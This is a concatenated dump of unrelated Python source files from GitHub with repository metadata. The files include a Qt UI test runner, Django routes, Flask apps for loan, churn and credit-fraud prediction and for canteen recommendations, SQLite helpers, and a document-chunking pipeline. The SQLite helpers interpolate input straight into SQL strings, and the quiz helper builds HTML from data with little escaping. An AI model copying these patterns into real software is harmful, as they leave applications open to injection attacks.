runTest(self):\n\n list_tests = []\n list_actions = []\n num_actions = []\n test_num = 0\n\n with open(self.file, 'r') as myfile:\n list_items = myfile.read().split(\"\\n\")\n for a_line in list_items:\n # Test title line denoted with #\n if a_line.startswith('#'):\n list_tests.append(a_line[1:].strip().replace('\\n',' '))\n test_num = len(list_tests)\n num_actions.append(0)\n\n # Individual actions within a test\n elif a_line:\n list_actions.append(a_line)\n\n # If the first line is not a title starting with #, use the file name as test name\n if test_num == 0:\n test_num = 1\n prefix, extension = os.path.splitext(str(self.file))\n list_tests.append(prefix)\n num_actions.append(0)\n num_actions[test_num-1] += 1\n\n # Create a tree widget\n frm = frmTreeViewUITest.frmTreeViewUITest()\n\n # Set title\n frm.setWindowTitle('UI Tests, check if passed: '+str(self.file))\n\n # Populate the tree list with list_tests (as parent), list_actions(as children)\n frm.set_tree(list_tests, list_actions, num_actions)\n\n # Execute the form\n frm.exec_()\n\n if not frm.OK:\n self.skipTest(\"User Skipped\")\n else:\n failed = []\n\n # Evaluating the status of parents and Children\n num_tests = frm.tree.topLevelItemCount()\n\n for i in range(num_tests):\n test_ = frm.tree.topLevelItem(i)\n test_state = test_.checkState(0) # 0-not checked, 1-checked in child, 2-all\n n_actions = test_.childCount()\n\n if test_state == 0:\n failed.append('\\nUI test failed: '+ str(test_.text(0)))\n\n elif test_state == 1:\n failed.append('\\nUI test failed: ' + str(test_.text(0)))\n for j in range(n_actions):\n action = test_.child(j)\n action_state = action.checkState(0)\n if action_state == 0:\n failed.append('Action: ' + str(action.text(0)))\n\n if failed:\n tester_notes = ''\n if frm.notes:\n tester_notes = frm.notes.toPlainText()\n self.fail(str(len(failed)) +\n \" steps failed in \" +\n self.file + ':\\n' +\n '\\n'.join(failed)+\n '\\n'+ tester_notes)\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n app = QApplication(sys.argv)\n\n my_suite = unittest.TestSuite()\n\n for test_file in glob.glob(\"*.txt\"):\n make_test = UserInterfaceTest()\n make_test.set_file(test_file)\n my_suite.addTest(make_test)\n\n # test_file = 'SWMM_UI_Testing.txt'\n # make_test = UserInterfaceTest()\n # make_test.set_file(test_file)\n # my_suite.addTest(make_test)\n\n report_filename = \"test_results_ui.html\"\n fp = open(report_filename, 'wb')\n runner = test.HTMLTestRunner.HTMLTestRunner(\n stream=fp,\n title='SWMM-EPANET UI Test Report',\n description='User Interface Test Results')\n\n runner.run(my_suite)\n fp.close()\n try:\n webbrowser.open_new_tab(report_filename)\n except:\n print(\"Test results written to \" + report_filename)\n\n sys.exit(app.exec_())\n\n","repo_name":"USEPA/SWMM-EPANET_User_Interface","sub_path":"test/ui/test_gui_swmm.py","file_name":"test_gui_swmm.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"29"} +{"seq_id":"38384732289","text":"from django.conf.urls import url\nfrom . import views\nfrom .feed import ArticleFeed\n\napp_name = \"myblog\"\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^single/([0-9]+)/$', views.single, name='single'),\n url(r'^category/([0-9]+)/$', views.category, name='category'),\n url(r'^tags/([0-9]+)/$', views.tags, name='tags'),\n url(r'^filetime/(.*?)/(.*?)/$', views.filetime, name='filetime'),\n url(r'^comment/(.*?)/$', views.comment, name='comment'),\n url(r'^rss/$', ArticleFeed(), name='rss'),\n]","repo_name":"dalao-B/PY1901Django","sub_path":"blog/myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16489450393","text":"from flask import Flask,request,render_template\nimport pickle\nimport json\nimport os\nfrom flask import Flask ,render_template,request\nimport pickle\nimport numpy\nimport pandas as pd\nimport csv\n\n\napp=Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\n\n@app.route('/about')\ndef about():\n\treturn render_template(\"about.html\")\n\n@app.route(\"/loan\",methods=[\"GET\",\"POST\"])\ndef loan():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"loan_s_p.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tai=float(request.form['ai'])\n\t\t\tci=float(request.form['ci'])\n\t\t\tlamt=float(request.form['lamt'])\n\t\t\tch=float(request.form['ch'])\n\t\t\tdata=[ai,ci,lamt,ch]\n\t\t\tprint(data)\n\t\t\tmarried=request.form['married']\n\t\t\tif married==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tdependents=request.form['dependents']\n\t\t\tif dependents == \"Zero dependents\":\n\t\t\t\tdata.extend([1,0,0,0])\n\t\t\telif dependents == \"One dependent\":\n\t\t\t\tdata.extend([0,1,0,0])\n\t\t\telif dependents == \"Two dependents\":\n\t\t\t\tdata.extend([0,0,1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,0,0,1])\n\n\t\t\teducation=request.form['education']\n\t\t\tif education == 1:\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tselfemp=request.form['selfemp']\n\t\t\tif selfemp == 1:\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tproparea=request.form['proparea']\n\t\t\tif proparea == \"Rural\":\n\t\t\t\tdata.extend([1,0,0])\n\t\t\telif proparea == \"SemiUrban\":\n\t\t\t\tdata.extend([0,1,0])\n\t\t\telif proparea == \"Urban\":\n\t\t\t\tdata.extend([0,0,1])\n\t\t\t\n\t\t\tprint(data)\n\t\t\t\n\t\t\tans=model.predict([data])\n\t\t\tif ans==\"Y\":\n\t\t\t\tmsg='We are pleased to inform you that your loan is approved'\n\t\t\telse:\n\t\t\t\tmsg='Sorry, your loan is rejected'\n\t\t\tmsg=msg\n\t\t\treturn render_template(\"loan.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\t\t\treturn render_template(\"loan.html\")\n\telse:\n\t\treturn render_template(\"loan.html\")\t\n\n@app.route(\"/churn\", methods=[\"GET\" , \"POST\"])\ndef churn():\n\tif request.method == \"POST\":\n\t\tf= None\n\t\tmodel = None\n\t\ttry:\n\t\t\tf=open(\"re.model\", \"rb\")\n\t\t\tmodel = pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\", e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\t\tif model is not None:\n\t\t\n\t\t\tn1= float(request.form[ \"n1\" ])\n\t\t\tn2= float(request.form[ \"n2\" ])\n\t\t\tn3=float(request.form[ \"n3\" ])\n\t\t\tn4=float(request.form[ \"n4\" ])\n\t\t\tn5=float(request.form[ \"n5\" ])\n\t\t\tn6=int(request.form[ \"n6\" ])\n\t\t\tdata=[n1,n2,n3,n4,n5,n6]\n\t\t\tprint(data)\n\t\t\tn7=request.form[\"myselect\"]\n\t\t\tif n7==\"Yes\":\n\t\t\t\tdata.extend([1])\n\t\t\telse:\n\t\t\t\tdata.extend([0])\n\t\t\tn8=request.form[\"myselect1\"]\n\t\t\tif n7==\"Male\":\n\t\t\t\tdata.extend([0,1])\n\t\t\telse:\n\t\t\t\tdata.extend([1,0])\n\t\t\t\n\t\t\tprint(data)\n\n\t\t\tans=model.predict([data])\n\t\t\tif ans=='1':\n\t\t\t\tmsg=\"HAS CHURNED\"\n\t\t\telse:\n\t\t\t\tmsg=\"NOT CHURNED\"\n\t\t\tmsg=\"Customer has: \" + msg\n\t\t\treturn render_template(\"churn.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\t\t\treturn render_template(\"churn.html\")\n\n\telse:\n\t\treturn render_template(\"churn.html\")\n\n\n\n@app.route(\"/credit\",methods=[\"GET\",\"POST\"])\n\ndef credit():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"CreditCard.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tn1=float(request.form[\"n1\"])\n\t\t\tn2=float(request.form[\"n2\"])\n\t\t\tn3=float(request.form[\"n3\"])\n\t\t\tn4=float(request.form[\"n4\"])\n\t\t\tn5=float(request.form[\"n5\"])\n\t\t\tn6=float(request.form[\"n6\"])\n\t\t\tdata=[n1,n2,n3,n4,n5,n6]\n\t\t\tprint(data)\n\t\t\tn7=request.form[\"myselect\"]\n\t\t\tif n7==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\n\t\t\tn8=request.form[\"myselect1\"]\n\n\t\t\tif n8==\"Yes\":\n\t\t\t\tdata.extend([1,0])\n\t\t\telse:\n\t\t\t\tdata.extend([0,1])\n\t\t\tprint(data)\n\t\t\t\n\t\t\tans=model.predict([data])\n\t\t\tif ans=='N':\n\t\t\t\tmsg=\"Legitimate Transaction\"\n\t\t\telse:\n\t\t\t\tmsg=\"Fraudulent Transaction\"\n\t\t\tmsg=\"Transaction is: \" + msg\n\t\t\treturn render_template(\"credit.html\",msg=msg)\n\t\telse:\n\t\t\tprint(\"model issue\")\n\telse:\n\t\treturn render_template(\"credit.html\")\n\t\t\n\n\n\n@app.route(\"/creditcsv\",methods=[\"GET\",\"POST\"])\n\n\ndef creditcsv():\n\tif request.method==\"POST\":\n\t\tf=None\n\t\tmodel=None\n\t\ttry:\n\t\t\tf=open(\"Creditcardcsv.model\",\"rb\")\n\t\t\tmodel=pickle.load(f)\n\t\texcept Exception as e:\n\t\t\tprint(\"Issue\",e)\n\t\tfinally:\n\t\t\tif f is not None:\n\t\t\t\tf.close()\n\n\t\tif model is not None:\n\t\t\tup_data = request.files.get('file')\n\t\t\tdata = []\n\t\t\tmessages = []\n\t\t\ti=0\n\t\t\tif up_data:\n\t\t\t\tfor row in up_data:\n\t\t\t\t\tvalues = row.decode().strip().split(\",\")\n\t\t\t\t\trow_data = [float(val) for val in values]\n\t\t\t\t\ti=i+1\n\t\t\t\t\tdata.append(row_data)\n\t\t\t\t\tpred = model.predict([row_data])\n\t\t\t\t\tprint(pred)\n\t\t\t\t\tif pred == 0:\n\t\t\t\t\t\tmsg = \"Legititimate Transaction\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tmsg = \"Fraudulent Transaction\"\n\t\t\t\t\t#msg = \" Legitimate Transaction \" if pred == '0' else \" Fraudulent Transaction\"\n\t\t\t\t\tmessages.append(str(i)+ \"] Transaction is: \" + msg + \"
    \")\n\t\t\treturn render_template(\"creditcsv.html\", msg='\\n'.join(messages))\n\t\telse:\n\t\t\tprint(\"Model issue\")\n\t\t\treturn render_template(\"creditcsv.html\", msg=\"Model issue\")\n\telse:\n\t\treturn render_template(\"creditcsv.html\")\n\t\t\t\n\n\n\nif __name__ == \"__main__\" :\n\tapp.run(debug=False,host='0.0.0.0',use_reloader=True)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akshata1710/financial-machine-learning-flask-website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"131019700","text":"import pandas as pd\nimport numpy as np\nimport sqlite3 as sql\n\ndef get_infos_risco(id_grupo):\n lista = []\n conn = sql.connect('Bases/Banco_dados_att.db')\n filtro = (f'SELECT CNPJ_CABECA, NM_SEGMENTO_RISCO_GRUPO, ID_SEGMENTO_RISCO_CABECA FROM IDGRUPO_SEGTO_RISCO WHERE ID_GRUPO = \"{id_grupo}\"')\n resp = pd.read_sql(filtro, conn)\n cnpj = str(resp.values[0][0])\n segto_risco = resp.values[0][1]\n id_segto_risco = resp.values[0][2]\n return {\"cnpj\": cnpj, \"segmento_risco\": segto_risco, \"id_segto_risco\":id_segto_risco}\n\ndef get_parametros_volatilidade(id_grupo):\n lista = []\n conn = sql.connect('Bases/Banco_dados_att.db')\n filtro_vol = (f'SELECT ds_volatilidade, id_volatilidade, id_grupo FROM parametros_estrategia_portfolio WHERE id_grupo = \"{id_grupo}\"')\n resp_vol = pd.read_sql(filtro_vol, conn)\n vol = str(resp_vol.values[0][0])\n id_vol = resp_vol.values[0][1]\n id_grupo = resp_vol.values[0][2]\n return {\"id_grupo\": id_grupo, \"ds_volatilidade\": vol, \"id_volatilidade\":id_vol}\n","repo_name":"caiobiondo/motor-iraroc","sub_path":"Abas/Aba_risco.py","file_name":"Aba_risco.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"73791359117","text":"import json\nimport os\nimport pickle\nimport re\nfrom dataclasses import dataclass\nfrom typing import Dict, List, Optional, Set\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pydash\nimport streamlit as st\nfrom config import config\n# from langchain.embeddings import VertexAIEmbeddings\nfrom langchain.schema.embeddings import Embeddings\nfrom langchain.text_splitter import (CharacterTextSplitter,\n RecursiveCharacterTextSplitter)\nfrom networkx.algorithms import community\nfrom scipy.spatial.distance import cosine\nfrom utilities.custom_logger import CustomLogger\n\nlogger = CustomLogger()\n\n\n@dataclass\nclass ProcessingPipeline:\n embeddings: Embeddings\n total_num_of_tokens: Optional[int] = None\n\n def process_document(self, document: str) -> List[str]:\n \"\"\"process a long document into list of shorter chunks, where each chunk has a unique topic\n\n Args:\n document (str): long text\n\n Returns:\n List[str]: list of chunks\n \"\"\"\n # remove sub-headers\n document = \"\\n\\n\".join([p if self.is_paragraph(p) else \"\\n\\n\" for p in document.split(\"\\n\\n\")])\n\n self.total_num_of_tokens = self.get_num_of_tokens(document)\n\n # split documents into chunks based on its original paragraphing\n chunks = [ch for ch in re.split(r\"[\\n]{3,}\", document) if len(ch) > 0]\n chunks = [config.remove_index(chunk, \"[\\\\n]{2,}\", \"(\\\\d+ *)\", \"\\n\\n\") for chunk in chunks]\n\n # ensure No. of tokens in each chunk < max context window\n chunks_require_split = list()\n for i, chunk in enumerate(chunks):\n chunk_len = self.get_num_of_tokens(chunk)\n logger.info(f\"number of tokens for {i}th chunk is: {chunk_len}\")\n if chunk_len > config.CHUNK_SIZE:\n chunks_require_split.append(i)\n\n if len(chunks_require_split) == 0:\n return chunks\n\n logger.info(f\"long chunks require to be splitted are: {chunks_require_split}\")\n\n apply_clsutering = True\n\n selected_chunks = []\n for i in chunks_require_split:\n if not apply_clsutering:\n text_splitter = CharacterTextSplitter().\\\n from_huggingface_tokenizer(\n config.TOKENIZER,\n chunk_size=config.CHUNK_SIZE // 2,\n chunk_overlap=0,\n separator=\"\\n\\n\",\n keep_separator=True\n )\n logger.info(f\"partition the {i}th chunk due to large size:\")\n splits = text_splitter.split_text(chunks[i])\n logger.info(f\"partitioned long chunk into {len(splits)} sub-chunks\")\n selected_chunks.extend(splits)\n\n else:\n logger.info(f\"partition the {i}th chunk due to large size:\")\n segments = chunks[i].split(\"\\n\\n\")\n if len(segments) <= 2:\n if len(segments) < 2:\n raise Exception(\"paragraph - {i} is too long and cannot be split\")\n selected_chunks.extend(segments)\n else:\n selected_chunks.extend(self.partition_segments(segments))\n logger.info(f\"partition for the {i}th chunk is completed\")\n\n chunks = selected_chunks\n\n length_max = max([self.get_num_of_tokens(ch) for ch in chunks])\n length_min = min([self.get_num_of_tokens(ch) for ch in chunks])\n\n logger.info(f\"After splitting by paragrah:\\ntotal No. of chunks: {len(chunks)}, max length: {length_max}, min length: {length_min}\")\n\n return chunks\n\n @staticmethod\n def get_num_of_tokens(text: str) -> int:\n \"\"\"get No. of tokens in the text\"\"\"\n return len(config.TOKENIZER.tokenize(text))\n\n def is_paragraph(self, txt):\n \"\"\"filter the paragraph with index\"\"\"\n if (re.match(r\"^[0-9]+ \", txt) is None) and (self.get_num_of_tokens(txt) < 20):\n return False\n else:\n return True\n\n def partition_segments(self, segments: List[str]) -> List[str]:\n \"\"\"To partition a large chunk, we first split the chunk into paragraphs, each paragraph is called a segment here. then\n we follow the algorithms below:\n 1. search for any segment with length > config.CHUNK_SIZE\n 2. consider the long segment as the original splitting points\n 3. aggregate the rest of segments by text embedding and Louvain\n Community Detection Algorithm\n 4. return partitions with texts\n\n Args:\n segments (List[str]): list of paragraphs\n\n Returns:\n List[str]: list of texts with length < config.CHUNK_SIZE\n \"\"\"\n long = []\n for i, sub in enumerate(segments):\n sub_len = self.get_num_of_tokens(sub)\n logger.info(f\"length of {i}th sub-chunk is {sub_len}\")\n if sub_len > config.CHUNK_SIZE:\n # TODO:\n pass\n elif sub_len > config.CHUNK_SIZE * config.SPLIT_RATIO:\n long.append(i)\n\n def group_similar_segments(segments: List[str]) -> List[Set[int]]:\n embedding_dict = self.get_embeddings(segments)\n long = self.cluster_similar_chunks(embedding_dict)\n\n return long\n\n chunks = list()\n if len(long) == 0:\n clsuters = group_similar_segments(segments)\n for idx, clu in enumerate(clsuters):\n chunk = \"\\n\\n\".join([segments[i] for i in clu])\n logger.info(f\"after partitioning, the length of {idx}th sub-chunk is {self.get_num_of_tokens(chunk)}\")\n chunks.append(chunk)\n return chunks\n\n res = list() # create a list to contain partitions\n segs = set() # create a set to contain the elements of a cluster\n for i in range(len(segments)):\n if i in long:\n # add the previous cluster\n start = min(segs)\n end = max(segs) + 1\n clusters_ = group_similar_segments(segments[start:end])\n clusters = list()\n ori = range(start, end)\n for clu in clusters_:\n clusters.append([ori[i] for i in clu])\n res.extend(clusters)\n\n # add the existing singleton\n res.append([i])\n\n # reset segs\n segs = set()\n else:\n segs.add(i)\n\n if len(segs) != 0:\n start = min(segs)\n end = max(segs) + 1\n clusters_ = group_similar_segments(segments[start:end])\n # map\n clusters = list()\n ori = range(start, end)\n for clu in clusters_:\n clusters.append([ori[i] for i in clu])\n res.extend(clusters)\n\n # del segs, ori, clusters_\n\n # map indexes back to texts\n for idx, clu in enumerate(res):\n chunk = \"\\n\\n\".join([segments[i] for i in clu])\n logger.info(f\"after partitioning, the length of {idx}th sub-chunk is {self.get_num_of_tokens(chunk)}\")\n chunks.append(chunk)\n\n return chunks\n\n def get_embeddings(self, paragraphs: List[str]) -> Dict[str, Dict]:\n \"\"\"embeddings for each paragraph.\n The API accepts a maximum of 3,072 input tokens and outputs 768-dimensional vector embeddings.\n Use the following parameters for the text embeddings model textembedding-gecko(it belongs to PaLM Model)\n\n Args:\n paragraphs (List[str]): texts\n\n Returns:\n Dict[str, Dict]: embeddings\n \"\"\"\n\n embedding_dict = dict()\n for idx, para in enumerate(paragraphs):\n sen_embedding = self.embeddings.embed_query(para)\n\n embedding_dict[str(idx)] = {\n \"text\": para,\n \"embedding\": sen_embedding\n }\n logger.info(\"embedding completed\")\n # with open(config.OUT_PATH / \"embedding_paragraph.json\", \"w\") as f:\n # json.dump(embedding_dict, f, indent=2)\n\n # load embeddings and get the similarity matrix for assessment\n # with open(config.OUT_PATH / \"embedding_paragraph.json\", \"r\") as f:\n # embedding_dict = json.load(f)\n\n return embedding_dict\n\n def cluster_similar_chunks(self, embedding_dict: Dict[str, Dict]) -> List[Set[int]]:\n \"\"\"\n cluster chunks into 1 if they share similar semantic meaning\n Args:\n embedding_dict (Dict[str, Dict]): embeddings\n\n Returns:\n List: list of chunk indexes\n \"\"\"\n # Get similarity matrix between the embeddings of the sentences' embeddings\n summary_similarity_matrix = np.zeros((len(embedding_dict), len(embedding_dict)))\n summary_similarity_matrix[:] = np.nan\n\n for row in range(len(embedding_dict)):\n for col in range(row, len(embedding_dict)):\n # Calculate cosine similarity between the two vectors\n similarity = 1 - cosine(embedding_dict[str(row)][\"embedding\"], embedding_dict[str(col)][\"embedding\"])\n summary_similarity_matrix[row, col] = similarity\n summary_similarity_matrix[col, row] = similarity\n\n plt.figure()\n plt.imshow(summary_similarity_matrix, cmap='Blues')\n plt.savefig(config.OUT_PATH / \"similarity_matrix_paragraph.jpg\")\n\n partitions = self.get_topics(\n [t[\"text\"] for t in embedding_dict.values()],\n summary_similarity_matrix,\n bonus_constant=0.2)\n\n # with open(config.OUT_PATH / \"chunks\", \"wb\") as fp:\n # pickle.dump(chunks, fp)\n\n return partitions\n\n def get_topics(self,\n texts: List[str],\n similarity_matrix: np.ndarray,\n bonus_constant: float = 0.25) -> List[Set[int]]:\n \"\"\"calculate if chunks belong to same cluster based on louvain community detection algorithm\n\n Args:\n similarity_matrix (np.ndarray): cosine similarity between chunks\n num_topics (int, optional): number of chunks in the end. Defaults to 8.\n bonus_constant (float, optional): Defaults to 0.25. This adds additional similarity score\n to the embedding's consine similarity if the two sentences are near. The purpose is to encourage contiguous clustering.\n\n Returns:\n _type_: _description_\n \"\"\"\n proximity_bonus_arr = np.zeros_like(similarity_matrix)\n for row in range(proximity_bonus_arr.shape[0]):\n for col in range(proximity_bonus_arr.shape[1]):\n if row == col:\n proximity_bonus_arr[row, col] = 1\n else:\n proximity_bonus_arr[row, col] = 1/(abs(row-col)) * bonus_constant\n\n similarity_matrix += proximity_bonus_arr\n\n similarity_matrix = nx.from_numpy_array(similarity_matrix)\n\n # Store the accepted partitionings\n resolution = 0.01 # increase resolution will favour smaller community\n resolution_step = 0.001\n partitions = []\n\n def is_partition_correct(partitions: List[Set], texts: List[str], thresh: int) -> bool:\n if len(partitions) == 0:\n return False\n\n for par in partitions:\n cluster = \"\\n\\n\".join([texts[p] for p in par])\n cluster_len = self.get_num_of_tokens(cluster)\n if cluster_len >= thresh:\n return False\n\n return True\n\n while not is_partition_correct(partitions, texts, config.CHUNK_SIZE):\n partitions = community.louvain_communities(\n G=similarity_matrix,\n resolution=resolution,\n seed=1)\n resolution += resolution_step\n logger.info(f\"successfully partitioned text into {partitions}\")\n\n return partitions\n\n# gcloud init:\n# https://cloud.google.com/sdk/docs/initializing\n# https://cloud.google.com/sdk/gcloud/reference/auth/activate-service-account#ACCOUNT\n","repo_name":"yang0369/LLM_summarization","sub_path":"src/load_and_chunk.py","file_name":"load_and_chunk.py","file_ext":"py","file_size_in_byte":12153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"6022835943","text":"import pyqrcode \n\ndef qr_code():\n s='https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley'\n d=pyqrcode.create(s)\n d.png('my_img.png',scale=6)\n print('Code Excecuted Proprly')\n\nif __name__ == '__main__':\n qr_code()","repo_name":"nikhilsahu2002/Python-Project-File","sub_path":"py_qrcode.py","file_name":"py_qrcode.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26101248795","text":"import html\n\ndef format_options(row):\n \n if row['type'] == 'select_word':\n answer = row['answer']\n onchange = f\"myFunction('{answer}', 's{row.name}', 'p{row.name}')\"\n html_open = f''\n options = ''.join([f'' \n for i in range(len(row['options']))])\n dropdown = html_open + opts_open + options + html_close\n return dropdown\n \n if row['type'] == 'noun_phrases':\n answer = row['answer']\n onchange = f\"myFunction('{answer}', 's{row.name}', 'p{row.name}')\"\n phrase = f'{row[\"object\"]} '\n html_open = f''\n options = ''.join([f'' \n for i in range(len(row['options']))])\n dropdown = phrase + html_open + opts_open + options + html_close\n return dropdown\n \n if row['type'] == 'select_sent':\n answer = row['answer'].replace(\"'\", '\\'').replace('\"','\\"')\n options = [opt.replace(\"'\", ''').replace('\"','"') for opt in row['options']]\n html_open = '
    '\n html_close = '
    '\n input_class = f'input class=\"form-check-input\" type=\"radio\"'\n label_class = f'label class=\"form-check-label\"'\n dropdown = ''.join([f'''{html_open}\n <{input_class} id=\"r{row.name}-{i}\" name=\"rname{row.name}\" \n onchange=\\'myFunction(\\\"{answer}\\\", \\\"r{row.name}-{i}\\\", \\\"p{row.name}\\\")\\'\n value=\\\"{options[i]}\\\">\n <{label_class} for=\"r{row.name}-{i}\">{row['options'][i]}\n {html_close}'''\n for i in range(len(row['options']))]) \n return dropdown\n \n if row['type'] == 'missing_word':\n answer = row['answer']\n onchange = f\"myFunction('{answer}', 't{row.name}', 'p{row.name}')\"\n input_field = f''\n return input_field\n\n","repo_name":"artefucktor/english_exercises","sub_path":"flask_app/format_options.py","file_name":"format_options.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"24758667029","text":"from django.conf.urls.defaults import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nimport os\nROOT_PATH = os.path.dirname(__file__)\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^mysite/', include('mysite.foo.urls')),\n\n\t(r'^polls/', include('polls.urls')),\n\t(r'^admin/', include(admin.site.urls)),\n\n\t(r'^wizards/$', 'wizardry.views.index'),\n\t(r'^wizards/(?P\\d+)/$', 'wizardry.views.detail'),\n\t(r'^json/$', 'wizardry.views.json'),\n (r'^static/(?P.*)$', 'django.views.static.serve'),\n\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs'\n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # (r'^admin/', include(admin.site.urls)),\n)","repo_name":"SebastianStadil/Wizardry","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"9884172234","text":"import os\nimport sys\n\nimport flask\nfrom flask import request, jsonify\n\nparent_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\nsys.path.append(parent_path)\nsys.path.append(\"~/tuk.mensa-kl-conv-ai/src/recommender.recommender\")\nfrom src.recommender.recommender import Recommender\nfrom src.recommender.data import clean_title_additives, get_meal_title_additives\n\nWEEKDAYS = {\n 1: \"Montag\",\n 2: \"Dienstag\",\n 3: \"Mittwoch\",\n 4: \"Donnerstag\",\n 5: \"Freitag\",\n 6: \"Samstag\",\n 7: \"Sonntag\"\n}\n\nSTR_WEEKDAYS_DE = ['Montag', 'Dienstag', 'Mittwoch', 'Donnerstag', 'Freitag', 'Samstag', 'Sonntag']\n\napp = flask.Flask(__name__)\nr = Recommender()\n\n\n@app.route('/')\ndef index():\n pass\n\n\n@app.route(\"/userexists\", methods=['POST'])\ndef user_exists():\n data = request.get_json()\n user_id = data[\"user_id\"]\n if r.users.user_exists(user_id):\n exists = 1\n else:\n exists = 0\n print(\"User exists: \" + str(exists))\n return jsonify({\"user_exists\": exists})\n\n\n@app.route(\"/usernoprofile\", methods=[\"POST\"])\ndef user_wants_no_profile():\n data = request.get_json()\n user_id = data[\"user_id\"]\n if r.users.wants_no_profile(user_id):\n no_profile = 1\n else:\n no_profile = 0\n print(\"User wants no profile: \" + str(no_profile))\n return jsonify({\"no_profile\": no_profile})\n\n\n@app.route(\"/setuserprofile\", methods=[\"POST\"])\ndef set_user_profile():\n data = request.get_json()\n user_id = data[\"user_id\"]\n r.users.set_wants_profile(user_id)\n return \"Set user wants profile\"\n\n\n@app.route(\"/setusernoprofile\", methods=[\"POST\"])\ndef set_user_no_profile():\n data = request.get_json()\n user_id = data[\"user_id\"]\n r.users.set_wants_no_profile(user_id)\n return \"Set user wants no profile\"\n\n\n@app.route(\"/prediction\", methods=['POST'])\ndef predict():\n week = False\n data = request.get_json()\n user_id = data[\"user_id\"]\n try:\n day = data[\"day\"]\n if day == 8:\n day = [1, 2, 3, 4, 5]\n week = True\n except KeyError:\n day = r.day\n if not week:\n predictions = []\n locations = []\n recommendation = r.predict(str(user_id), day=day)\n menu = r.menu.get_food_per_day(WEEKDAYS[day])\n if menu is None:\n predictions = []\n else:\n recommendation = [(menu.title.values[i], recommendation[i][1], menu[\"loc\"].values[i]) for i in\n range(len(recommendation))]\n recommendation = sorted(recommendation, key=lambda x: x[1], reverse=True)\n filtered_recommendation = []\n for meal in recommendation:\n if not r.filter_additives(user_id, get_meal_title_additives(meal[0])):\n filtered_recommendation.append(meal)\n # current_day = []\n # for prediction in recommendation:\n # current_day.append(clean_title_additives(prediction[0]))\n if filtered_recommendation != []:\n predictions.append([clean_title_additives(filtered_recommendation[0][0])])\n locations.append([filtered_recommendation[0][2]])\n\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = predictions\n answer[\"day\"] = day\n return jsonify(answer)\n else:\n predictions = []\n locations = []\n days = []\n for d in day:\n current_day = []\n recommendation = r.predict(str(user_id), day=d)\n menu = r.menu.get_food_per_day(WEEKDAYS[d])\n if menu is None:\n continue\n else:\n recommendation = [(menu.title.values[i], recommendation[i][1], menu[\"loc\"].values[i]) for i in\n range(len(recommendation))]\n recommendation = sorted(recommendation, key=lambda x: x[1], reverse=True)\n filtered_recommendation = []\n for meal in recommendation:\n if not r.filter_additives(user_id, get_meal_title_additives(meal[0])):\n filtered_recommendation.append(meal)\n if filtered_recommendation != []:\n current_day.append(clean_title_additives(filtered_recommendation[0][0]))\n locations.append([filtered_recommendation[0][2]])\n # for prediction in recommendation:\n # current_day.append(clean_title_additives(prediction[0]))\n days.append(d)\n predictions.append(current_day)\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = predictions\n answer[\"day\"] = days\n return 